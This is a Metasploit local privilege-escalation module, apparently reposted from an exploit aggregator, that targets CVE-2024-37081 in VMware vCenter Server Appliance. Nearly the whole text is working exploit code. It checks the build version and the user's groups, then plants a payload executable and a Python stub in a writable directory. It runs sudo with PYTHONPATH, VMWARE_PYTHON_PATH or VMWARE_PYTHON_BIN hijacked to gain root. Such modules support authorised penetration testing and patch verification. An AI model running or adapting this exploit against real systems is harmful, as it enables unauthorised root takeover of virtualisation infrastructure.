Share
## https://sploitus.com/exploit?id=MSF:EXPLOIT-LINUX-LOCAL-VCENTER_SUDO_LPE-
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = GreatRanking
include Msf::Post::Linux::Priv
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
include Msf::Post::Vcenter::Vcenter
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'vCenter Sudo Privilege Escalation',
'Description' => %q{
VMware vCenter Server < 7.0.3 update R and < 8.0.2 update D
contains multiple local privilege escalation vulnerabilities
due to misconfiguration of sudo. An authenticated local user
with non-administrative privileges may exploit these issues
to elevate privileges to root on vCenter Server Appliance.
Tested against VMware vCenter Server Appliance 8.0.0.10000 20519528
},
'License' => MSF_LICENSE,
'Author' => [
'h00die', # msf module
'Matei "Mal" Badanoiu', # discovery
],
'Platform' => [ 'linux' ],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [
[ 'Auto', {} ],
],
'Privileged' => true,
'References' => [
[ 'URL', 'https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24453'],
[ 'URL', 'https://github.com/mbadanoiu/CVE-2024-37081/blob/main/VMware%20vCenter%20-%20CVE-2024-37081.pdf'],
[ 'CVE', '2024-37081']
],
'DisclosureDate' => '2024-06-18',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [ARTIFACTS_ON_DISK]
}
)
)
register_advanced_options [
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
OptInt.new('TIMEOUT', [ true, 'Command timeout', 30 ])
]
end
def base_dir
datastore['WritableDir'].to_s
end
def check
vbuild = get_vcenter_build
# VMware VirtualCenter 7.0.3 build-19480866
# VMware vCenter Server Appliance 6.5.0.0 Build 16197320
# we want to try to make this build number Rex::Version friendly. https://rubular.com/r/BNLDjy0C862cdS
# technically we only care about major release 7 and 8, however we'll try to future proof w/ \d instead
return CheckCode::Safe("Unable to determine vcenter build from output: #{vbuild}") unless /(\d+\.\d+\.\d+) build[- ](\d+)/i =~ vbuild
vbuild_version = Rex::Version.new("#{Regexp.last_match(1)}.#{Regexp.last_match(2)}")
return CheckCode::Safe("Version not vulnerable: #{vbuild}") unless (vbuild_version > Rex::Version.new('8.0.0') && vbuild_version < Rex::Version.new('8.0.2.23929136')) || # 8.0 u2d
(vbuild_version > Rex::Version.new('7.0.0') && vbuild_version < Rex::Version.new('7.0.3.24026615')) # 7.0 u3r
vprint_good("Exploitable version detected: #{vbuild_version}")
@user = cmd_exec('whoami').chomp
@groups = cmd_exec('groups').chomp.split(' ')
if ['infraprofile', 'vpxd', 'sts', 'pod'].include?(@user) || (['operator', 'admin'] & @groups).any?
vprint_good('User is vulnerable')
else
return CheckCode::Safe("User not vulnerable or not in correct group. (#{@user}:#{@groups})")
end
CheckCode::Appears("Version #{vbuild_version} and user (#{@user}:#{@groups}) are vulnerable")
end
def exploit_operator_group
# for this exploit we abuse get_user_password_status.py as it does a 'import spwd', so if we
# modify the PYTHONPATH and set our payload to spwd.py, we'll get arbitrary execution
vprint_status('Utilizing PYTHONPATH exploitation method for operator group.')
vuln_exe = '/usr/lib/applmgmt/support/scripts/get_user_password_status.py'
return Failure::NotFound, "Vulnerable script #{vuln_exe} not found" unless file? vuln_exe
# Upload payload executable
payload_path = "#{base_dir}/#{rand_text_alphanumeric(6..10)}"
upload_and_chmodx payload_path, generate_payload_exe
register_files_for_cleanup(payload_path)
# Upload payload stub
payload_stub = "#{base_dir}/spwd.py"
write_file(payload_stub, "import os\nos.system('#{payload_path}')\nquit()")
register_files_for_cleanup(payload_stub)
print_status 'Launching exploit...'
output = cmd_exec "sudo PYTHONPATH=#{base_dir} #{vuln_exe}", nil, datastore['TIMEOUT']
output.each_line { |line| vprint_status line.chomp }
end
def exploit_pod_user
# for this exploit we abuse install-parametery as it does a 'from appliance...', so if we
# modify the VMWARE_PYTHON_PATH and set our payload to __init__.py, we'll get arbitrary execution
vprint_status('Utilizing VMWARE_PYTHON_PATH exploitation method for pod user.')
mkdir("#{base_dir}/appliance")
# Upload payload executable
payload_path = "#{base_dir}/appliance/#{rand_text_alphanumeric(6..10)}"
upload_and_chmodx payload_path, generate_payload_exe
register_files_for_cleanup(payload_path)
# Upload payload stub
payload_stub = "#{base_dir}/appliance/__init__.py"
write_file(payload_stub, "import os\nos.system('#{payload_path}')\nquit()")
register_files_for_cleanup(payload_stub)
print_status 'Launching exploit...'
output = cmd_exec "sudo VMWARE_PYTHON_PATH=#{base_dir} install-parameter", nil, datastore['TIMEOUT']
output.each_line { |line| vprint_status line.chomp }
end
def exploit_admin_group
# for this exploit we abuse /bin/dcli, a bash script, as it executes $VMWARE_PYTHON_BIN
# so we modify the VMWARE_PYTHON_BIN, and we'll get arbitrary execution
vprint_status('Utilizing VMWARE_PYTHON_BIN exploitation method for admin group.')
mkdir("#{base_dir}/appliance")
# Upload payload executable
payload_path = "#{base_dir}/appliance/#{rand_text_alphanumeric(6..10)}"
upload_and_chmodx payload_path, generate_payload_exe
register_files_for_cleanup(payload_path)
# Upload payload stub
payload_stub = "#{base_dir}/appliance/__init__.py"
write_file(payload_stub, "import os\nos.system('#{payload_path}')\nquit()")
register_files_for_cleanup(payload_stub)
print_status 'Launching exploit...'
output = cmd_exec "sudo VMWARE_PYTHON_BIN=#{payload_path} /bin/dcli", nil, datastore['TIMEOUT']
output.each_line { |line| vprint_status line.chomp }
end
def exploit
if !datastore['ForceExploit'] && is_root?
fail_with(Failure::None, 'Session already has root privileges. Set ForceExploit to override')
end
unless writable?(base_dir)
fail_with(Failure::BadConfig, "#{base_dir} is not writable")
end
@user = cmd_exec('whoami').chomp if @user.nil?
@groups = cmd_exec('groups').chomp.split(' ') if @groups.nil?
if @user == 'pod'
exploit_pod_user
elsif @groups.include? 'operator'
exploit_operator_group
elsif @groups.include? 'admin'
exploit_admin_group
else
fail_with(Failure::BadConfig, "User not vulnerable or not in correct group. (#{@user}:#{@groups})")
end
end
end